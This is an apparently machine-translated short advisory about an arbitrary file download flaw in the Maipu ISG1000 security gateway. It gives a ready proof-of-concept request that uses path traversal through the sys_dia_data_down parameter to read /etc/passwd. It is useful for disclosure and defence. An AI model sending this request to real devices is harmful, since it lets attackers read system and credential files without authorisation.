Maipu Isg1000 Security Gateway Sys_dia_data_down Arbitrary File Download Vulnerability
Maipu Isg1000 Security Gateway Sys_dia_data_down Arbitrary File Download Vulnerability
Maipu ISG1000 Security Gateway sys_dia_data_down Arbitrary file download vulnerability
Vulnerability Description
Maipu ISG1000 Security Gateway There is a vulnerability to download any file on the server. The attacker can obtain any file on the server through the vulnerability.
Vulnerability Impact
Maipu ISG1000 Security Gateway
Network surveying and mapping
Vulnerability reappears
The login page is as follows
The requested POC is
/webui/?g=sys_dia_data_down&file_name=../etc/passwd
If you gain something, just like it
This post is licensed under CC BY 4.0 by the author.